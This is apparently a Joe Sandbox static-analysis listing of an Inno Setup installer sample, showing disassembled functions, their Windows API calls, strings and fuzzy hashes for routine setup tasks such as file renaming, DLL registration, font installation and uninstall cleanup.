EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C

Function 0045326C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 225COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353

Strings

$pI, xrefs: 00453594, 0045330B, 00453376, 0045330E
[rename], xrefs: 004533B6, 004533F2
WININIT.INI, xrefs: 00453301
oI, xrefs: 00453390, 004533A0, 004533D3, 0045346B, 00453476, 0045345E
NUL, xrefs: 00453415
MoveFileEx, xrefs: 00453563
.tmp, xrefs: 0045330F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
API String ID: 390214022-3415521383
Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58

Function 0047FE1C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170windowCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
FreeLibrary.KERNEL32(02390000), ref: 0047FFD8
SendNotifyMessageA.USER32(0001043A,00000496,00002710,00000000), ref: 0048004A

Strings

Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
Restarting Windows., xrefs: 00480025
Deinitializing Setup., xrefs: 0047FE3A
DeinitializeSetup, xrefs: 0047FED5
GetCustomSetupExitCode, xrefs: 0047FE79

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99

Function 00460DB4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00460DEF
GetActiveWindow.USER32 ref: 00460E53
CoInitialize.OLE32(00000000), ref: 00460E67
SHBrowseForFolder.SHELL32(?), ref: 00460E7E
CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2

Strings

A, xrefs: 00460E27

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
String ID: A
API String ID: 2684663990-3554254475
Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59

Function 00471998 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC

Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39

Strings

desktop.ini, xrefs: 004719D0
CLSID2, xrefs: 004719E6
.ShellClassInfo, xrefs: 004719EB
{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 004719F5
target.lnk, xrefs: 00471A11

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C

Function 00401A90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
LocalFree.KERNEL32(00773D48,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(?,00000000,00008000,00773D48,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(00772D98,?,00000000,00008000,00773D48,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62

Strings

l3w, xrefs: 00401B11
H=w, xrefs: 00401AC9, 00401AD6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: H=w$l3w
API String ID: 3782394904-1292453710
Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF

Function 0045C9D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(02390000,inflateInit_), ref: 0045C9DD
GetProcAddress.KERNEL32(02390000,inflate), ref: 0045C9ED
GetProcAddress.KERNEL32(02390000,inflateEnd), ref: 0045C9FD
GetProcAddress.KERNEL32(02390000,inflateReset), ref: 0045CA0D

Strings

inflateEnd, xrefs: 0045C9F7
inflateReset, xrefs: 0045CA07
inflateInit_, xrefs: 0045C9D7
inflate, xrefs: 0045C9E7

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C

Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041A9C9
73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
SetBkColor.GDI32(?,?), ref: 0041AA18
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
SetBkColor.GDI32(00000000,?), ref: 0041AAD3

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68

Function 004572BC Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2

Strings

D, xrefs: 00457398
/s ", xrefs: 0045732B
regsvr32.exe", xrefs: 00457303
0x%x, xrefs: 00457405
Spawning 32-bit RegSvr32: , xrefs: 00457369
Spawning 64-bit RegSvr32: , xrefs: 00457347
CreateProcess, xrefs: 004573D4
/u, xrefs: 0045731E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59

Function 0044C9CC Relevance: 13.6, APIs: 9, Instructions: 90COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
GetSysColor.USER32(00000014), ref: 0044CA04
SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
GetSysColor.USER32(00000010), ref: 0044CA56
SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669

Function 00494950 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34

Strings

Deleting Uninstall data files., xrefs: 00494957

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D

Function 0046F1E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
AddFontResourceA.GDI32(00000000), ref: 0046F27B
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F

Strings

AddFontResource, xrefs: 0046F299
Failed to open Fonts registry key., xrefs: 0046F265
Failed to set value in Fonts registry key., xrefs: 0046F250

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E

Function 00462558 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE

GetVersion.KERNEL32 ref: 00462588
SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
LoadCursorA.USER32(00000000,00007F02), ref: 00462601
SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A

Strings

Explorer, xrefs: 004625A2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
String ID: Explorer
API String ID: 2594429197-512347832
Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE

Function 00476E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BD8,?,?,?,02132BD8), ref: 00476E74
CloseHandle.KERNEL32(00000000,?,?,?,02132BD8,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92

Strings

GetFinalPathNameByHandleA, xrefs: 00476E27
kernel32.dll, xrefs: 00476E2C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FileHandle$AddressAttributesCloseCreateModuleProc
String ID: GetFinalPathNameByHandleA$kernel32.dll
API String ID: 2704155762-2318956294
Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E

Function 0045952C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2

Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5

Strings

Failed to delete directory (%d). Will retry later., xrefs: 0045960B
Failed to strip read-only attribute., xrefs: 004595C0
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
Failed to delete directory (%d)., xrefs: 00459688
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
Stripped read-only attribute., xrefs: 004595B4
Deleting directory: %s, xrefs: 0045957B

Memory Dump Source

